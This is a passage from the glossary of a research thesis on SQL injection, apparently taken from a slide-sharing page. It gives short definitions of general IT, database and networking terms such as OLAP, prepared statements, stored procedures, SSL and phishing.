components include mission, functional and
information requirements, system configurations, and
information flows. Technical components include IT
standards and rules that will be used to implement the
logical architecture.
Interoperability The ability of two or more
systems, or components to exchange information, and
to use the information that has been exchanged. For

Hacking with SQL Injection Exposed CCXXXIII
example, interoperability would be required for a
digital television set to be plugged into a DVD player
that is plugged into cable with all the components
working together.
Kernel The core of an operating system that
handles tasks such as memory allocation, device input
and output, process allocation, security and user
access.
LDAP Acronym for Lightweight Directory Access
Protocol, which defines a standard for organizing
directory hierarchies and interfacing to directory
servers.
MDX Multidimensional expression language, the
multidimensional equivalent of SQL. The language
used to define multidimensional data selections and
calculations in Microsoft’s OLE DB for OLAP API
(Tensor). It is also used as the calculation definition
language in Microsoft’s OLAP Services.
Metadata Data about data. Index-type information
pertaining to the entire data set rather than the
objects within the data set Metadata is essential for
understanding information stored in databases and has
become increasingly important in XML-based Web
applications.
ODBC Acronym for Open Database Connectivity.
A standardised interface, or middleware, for accessing
a database from a program.
OLAP Acronym for Online Analytical Processing.
On-line retrieval and analysis of data to reveal business
trends and statistics not directly visible in the data
directly retrieved from a data warehouse. Also known
as multidimensional analysis.
OleDb Acronym for Object Linking and Embedding
Database. It is used to implement Microsoft's strategy
of Universal Data Access (UDA) – to access any type
of data from any application (text files, spreadsheets,
email, relational databases, address books) from any
storage device (desktop computer, mainframe,
Internet, etc.)
OLTP Acronym for Online Transaction Processing.
Class of programs that facilitate and manage
transaction-oriented applications, typically for data
entry and retrieval transactions in a number of
industries, including banking, airlines, mail order,
supermarkets, and manufacturers.
OSI Model The seven-layer OSI Reference model
was developed by the ISO subcommittee. The OSI
model serves as a logical framework of protocols for
computer-to-computer communications. Its purpose
is to facilitate the interconnection of networks.
Phishing Is the act of tricking someone into giving
them confidential information or tricking them into
doing something that they normally wouldn’t do or
shouldn’t do. For example: sending an e-mail to a user
falsely claiming to be an established legitimate
enterprise in an attempt to scam the user into
surrendering private information that will be used for
identity theft.
Prepared Statements The PREPARE statement
feature supported by many databases, which allows a
client to pre-issue a template SQL query at the
beginning of a session; for the actual queries, the client
only needs to specify the variables that change.
RDBMS Acronym for Relational Database
Management System. A software application that
manages a structured collection of information,
automatically maintaining defined data relationships,
which can be accessed by simultaneous users to
update or review data residing in the database.
SQL Acronym for Structured Query Language. A
standard interactive and programming language for
getting information from and updating a database.
Although SQL is both an ANSI and an ISO standard,
many database products support SQL with proprietary
extensions to the standard language. Queries take the
form of a command language.
SSL Acronym for Secure Sockets Layer, a protocol
developed by Netscape for transmitting private
documents via the Internet. SSL works by using a
private key to encrypt data that's transferred over the
SSL connection. Both Netscape Navigator and
Internet Explorer support SSL, and many Web sites
use the protocol to obtain confidential user
information, such as credit card numbers. By
convention, URLs that require an SSL connection start
with https: instead of http.

Hacking with SQL Injection ExposedCCXXXIV
Stakeholders Those people and organisations who
may affect, be affected by, or perceive themselves to
be affected by, a decision or activity.
Stored Procedure A set of SQL statements (and
with those RDBMSs that support them, flow-control
statements) that are stored under a procedure name
so that the statements can be executed as a group by
the database server. Some RDBMSs, such as Microsoft
and Sybase SQL Server, precompile stored
procedures so that they execute more rapidly.
Sysadmin The term system administrator
(abbreviation: sysadmin) designates a job position of
engineers involved in computer systems. They are the
people responsible for running the system, or running
some aspect of it.
Transact-SQL A superset of ANSI SQL used by
Microsoft and Sybase SQL Server. Transact-SQL
includes flow-control instructions, and the capability to
define and use stored procedures that include
conditional execution and looping.
Telnet The Internet standard protocol for remote
terminal connection service. TELNET allows a user at
one site to interact with a remote timesharing system
at another site as if the user's terminal was connected
directly to the remote computer.
TCP Acronym for Transmission Control Protocol.
Used along with the Internet Protocol (IP) to send
data in the form of individual units (called packets)
between computers over the Internet. Whereas IP
handles the actual delivery of the data, TCP keeps
track of the packets that a message is divided into for
efficient routing through the Internet.
UDDI An acronym for "Universal description,
discovery and integration”. Is an online directory that
gives businesses and organizations a uniform way to
describe their services, discover other companies'
services and understand the methods required to
conduct business with a specific company.
URI An acronym for "Uniform Resource Identifier”.
Is a formatted string that serves as an identifier for a
resource, typically on the Internet. URIs are used in
HTML to identify the anchors of hyperlinks. URIs in
common practice include Uniform Resource Locators
(URLs)[URL] and Relative URLs [RELURL].
URL An acronym for "Uniform Resource Locator,"
this is the address of a resource on the Internet.
World Wide Web URLs begin with http://.
Web Short for World Wide Web.
Web Page A single document or file on the World
Wide Web, identified by a unique URL..
Web Services A platform-independent standard
based on XML to communicate within distributed
systems. They are loosely coupled and allow short-
term cooperations between services. The main
protocol defining the kind of communication to a web
service is SOAP (Simple Object Access Protocol).
White Hat A Whitehat, also rendered as White hat
or White-hat, is, in the realm of Information
technology, a name that describes a person who is
ethically opposed to the abuse of Computer systems.
Realizing that the Internet now represents human
voices from all around the world makes the defence of
its integrity an important pastime for many. A
Whitehat generally focuses on securing IT Systems
whereas a Blackhat (the opposite) would like to break
into them.
WWW Acronym for World Wide Web. A
hypertext-based, distributed information system
originally created by researchers at CERN, the
European Laboratory for Particle Physics, to facilitate
sharing research information. The Web presents the
user with documents, called web pages, full of links to
other documents or information systems. Selecting
one of these links, the user can access more
information about a particular topic. Web pages
include text as well as multimedia (images, video,
animation, sound).

Hacking With Sql Injection Exposed - A Research Thesis

More Related Content

What's hot

Viewers also liked

Similar to Hacking With Sql Injection Exposed - A Research Thesis

Recently uploaded

Hacking With Sql Injection Exposed - A Research Thesis